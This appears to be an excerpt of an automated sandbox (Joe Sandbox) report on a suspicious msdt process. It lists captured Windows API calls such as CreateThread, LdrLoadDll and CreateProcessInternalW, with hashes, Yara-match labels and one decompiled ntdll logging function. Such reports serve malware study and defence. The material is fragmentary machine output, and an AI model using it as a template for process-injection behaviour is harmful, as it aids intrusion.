                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 297 59a660-59a691 call 59af50 RtlFreeHeap
                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00583AF8), ref: 0059A68D
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID: .z`
                            • API String ID: 3298025750-1441809116
                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                            • Instruction ID: 5247282cd1b1f16a31c03036eee450bb784a7f6118d4465e2b08ab2b910b5f56
                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                            • Instruction Fuzzy Hash: A5E01AB52002046BDB14DF59CC49EA777ACAF88750F014554B91C57241C630E9108AF0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 294 59a620-59a651 call 59af50 RtlAllocateHeap
                            APIs
                            • RtlAllocateHeap.NTDLL(&EY,?,00594C9F,00594C9F,?,00594526,?,?,?,?,?,00000000,00000000,?), ref: 0059A64D
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID: &EY
                            • API String ID: 1279760036-1547219280
                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                            • Instruction ID: 4bb2d7550c91e92d6de50d81864673c049d9f89b1bbf899789960e18a13e10ce
                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                            • Instruction Fuzzy Hash: 49E012B6200208ABDB14EF99CC85EA777ACAF88754F118558BA1C5B242C630F9108AF0
                            Uniqueness

                            Uniqueness Score: -1.00%


                            APIs
                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0058836A
                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0058838B
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            • Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                            • Instruction ID: aaba508904d50aa33e32dfd38ba93b0203960519ee2e09c08697ecda0993b0fb
                            • Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                            • Instruction Fuzzy Hash: E6018431A8022977EB21B6949C07FBE7B6CBB40F50F040115FF04BA1C2EA946D0647E6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0058F040,?,?,00000000), ref: 005991DC
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: e3fb6a1eaa9e608ab8dbf360d5fcfd057221313f7c6d2e9b0f09d5b8361e8bda
                            • Instruction ID: 52c05535cbb637fe1977bbbef547c33b5be8d00cc3f046b0771a53d41d239744
                            • Opcode Fuzzy Hash: e3fb6a1eaa9e608ab8dbf360d5fcfd057221313f7c6d2e9b0f09d5b8361e8bda
                            • Instruction Fuzzy Hash: ED41A1B6600706ABDB28DF78DC85FE7B7A8BF84700F040519F56997281CB70B924CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0058AD52
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                            • Instruction ID: c791559bfedac54a3b99f167d234ba9d9ab76acbbfcba8090556fc89bc186bde
                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                            • Instruction Fuzzy Hash: DA015EB5D4020EABEF10EBA4DD46F9DBB78AB54308F0041A5ED08A7241F671EB14CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0059A724
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateInternalProcess
                            • String ID:
                            • API String ID: 2186235152-0
                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                            • Instruction ID: 7a539360720147e3a18fa65169cd83c0d5f6a33b4f748856fc588a4e85ff30b9
                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                            • Instruction Fuzzy Hash: 3301B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0059A724
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateInternalProcess
                            • String ID:
                            • API String ID: 2186235152-0
                            • Opcode ID: 7f45e1c73b4783e104718af116f4921e4eaf169cdca1fe534bd6f8690c067df3
                            • Instruction ID: d600f8739203d45b948f88ebc600f17407bd4aeba891f75cbf30c55357b24ea4
                            • Opcode Fuzzy Hash: 7f45e1c73b4783e104718af116f4921e4eaf169cdca1fe534bd6f8690c067df3
                            • Instruction Fuzzy Hash: 2D01AFB6210108AFCB54DF89DC84EEB77ADAF8C354F158248FA0D97245C630E851CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0058F040,?,?,00000000), ref: 005991DC
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: cc6ba79f7baebd1dc24863936c8c635db9877f7ae517f3169b85bd93a626eedd
                            • Instruction ID: 236c0c0bc138807b59fdf171811648d3ff14aa55a1d419f6d432d359df9a6580
                            • Opcode Fuzzy Hash: cc6ba79f7baebd1dc24863936c8c635db9877f7ae517f3169b85bd93a626eedd
                            • Instruction Fuzzy Hash: C0E06D373912043AEA306599AC02FA7B79CAB81B20F14002AFA0DEB2C1D595F80146A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0058AD52
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: c4e70a7a1212cc6ecd9781bf9e0a9810e00a3649e48ab306136b5ded73e65874
                            • Instruction ID: 4dcde146063ba4dd620bae4553a83d7032330a48cbb9d3b031f8a77b37dcff2b
                            • Opcode Fuzzy Hash: c4e70a7a1212cc6ecd9781bf9e0a9810e00a3649e48ab306136b5ded73e65874
                            • Instruction Fuzzy Hash: 5EF0B471D4010EABEF00DA94D842FDDBBB4AB54309F0082D5ED1CDB240F1709A188741
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0058F1C2,0058F1C2,?,00000000,?,?), ref: 0059A7F0
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                            • Instruction ID: ab1ff5f389d40f4cab8798a526c39ae243e57da345146b76e2fd32b1b68c31d8
                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                            • Instruction Fuzzy Hash: ABE01AB52002086BDB10DF49CC85EE737ADAF89750F018154BA0C57241C930E8108BF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,00588D14,?), ref: 0058F6EB
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            • Opcode ID: b511b2bf0bfbf690b5e5f8e155b64c5a4ed8573599fc8832fea0d273f6befb68
                            • Instruction ID: 2355aa97187c02336f3ae30e3b101fce1c462368ba18e284ccef326e68f01056
                            • Opcode Fuzzy Hash: b511b2bf0bfbf690b5e5f8e155b64c5a4ed8573599fc8832fea0d273f6befb68
                            • Instruction Fuzzy Hash: 34E0C2856A83812AE710AAF45D03F173F941711744F2906B8A488AF183D818C0061336
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,00588D14,?), ref: 0058F6EB
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                            • Instruction ID: e06e6af9547203f630f377cb9600ef824879951a4c6343eb5f60b9e08fc24e0e
                            • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                            • Instruction Fuzzy Hash: C7D0A7727503043BEA10FAE59C07F2637CC7B44B04F490074F948E73C3E954E8014665
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                            • Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: cbe774aef497af05128902139a08cad897df03c89b7c34b61595848c9f30b6d3
                            • Instruction ID: 19a7c12f2018f14f601814bec95284a66011731a66ca95b090792b4ac396b921
                            • Opcode Fuzzy Hash: cbe774aef497af05128902139a08cad897df03c89b7c34b61595848c9f30b6d3
                            • Instruction Fuzzy Hash: 74B09BB29014D5C5F711D76046087177D04F7D0745F56C5A5D1020645B4778E091F5B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 53%
                            			E04B5FDDA(intOrPtr* __edx, intOrPtr _a4) {
                            				void* _t7;
                            				intOrPtr _t9;
                            				intOrPtr _t10;
                            				intOrPtr* _t12;
                            				intOrPtr* _t13;
                            				intOrPtr _t14;
                            				intOrPtr* _t15;
                            
                            				_t13 = __edx;
                            				_push(_a4);
                            				_t14 =  *[fs:0x18];
                            				_t15 = _t12;
                            				_t7 = E04B0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                            				_push(_t13);
                            				E04B55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                            				_t9 =  *_t15;
                            				if(_t9 == 0xffffffff) {
                            					_t10 = 0;
                            				} else {
                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                            				}
                            				_push(_t10);
                            				_push(_t15);
                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                            				return E04B55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                            			}











                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B5FDFA
                            Strings
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04B5FE01
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04B5FE2B
                            Memory Dump Source
                            • Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                            • Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                            • API String ID: 885266447-3903918235
                            • Opcode ID: 35aa9a4ddabf9e6209fcf10efbc8eb72cf6831a9305e543efcce70e18800b96b
                            • Instruction ID: d00cd1b4e69d074f5c794ac4cfe881c38314a4255791ce421afad2a924c4fe8c
                            • Opcode Fuzzy Hash: 35aa9a4ddabf9e6209fcf10efbc8eb72cf6831a9305e543efcce70e18800b96b
                            • Instruction Fuzzy Hash: FEF0F032200201BFEA251A45DC06F73FF6AEB84730F244395FA68561E1EA62F86096F4
                            Uniqueness

                            Uniqueness Score: -1.00%